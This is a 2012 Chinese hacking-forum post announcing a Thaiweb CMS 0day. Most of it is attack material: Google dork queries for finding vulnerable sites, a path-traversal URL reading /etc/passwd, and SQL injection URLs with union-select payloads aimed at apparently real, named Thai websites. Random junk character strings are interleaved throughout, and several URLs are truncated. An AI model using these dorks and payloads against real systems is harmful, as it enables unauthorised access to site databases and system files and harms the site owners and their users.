找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1961|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
8 X/ q" W9 [3 \; c; y7 o8 l0 b5 D& `8 x; {8 h# D# v
intext:powered by Thaiweb7 h. x  n2 ?. I2 q- a9 z
+ U! F# g6 U0 X& b! C3 s  p
inurl:index.php?page=board.php$ k& V" U+ q/ R# ]0 c% a

3 B2 ^3 M  K8 s; L
$ t% X% }+ {$ w( S7 o! ~) c- f; ~* t9 n. O4 q2 S1 V7 b
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
5 ]2 m8 j0 r9 V4 W, [" D4 [: o1 c2 U3 Z  C

/ N* M: N9 Y, A# B% ]8 v9 B' a0 n( @6 ]1 A: ^# o
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
& ^. n/ Z% Q$ l- q0 {5 t+ C, j) ^2 v+ g% z

# \) x* ]/ O: J$ ?) |+ h" i. g, q$ o( i
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
+ G9 P- C, R1 Y$ l% b1 k: K/ u9 X0 f, i( Z
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--5 w) g- N7 ]3 j
  T* r$ G! Y2 }  V! Q! X( t2 u
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
6 j0 i* D4 N8 J* l0 k, a. E* q5 Q. B: @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表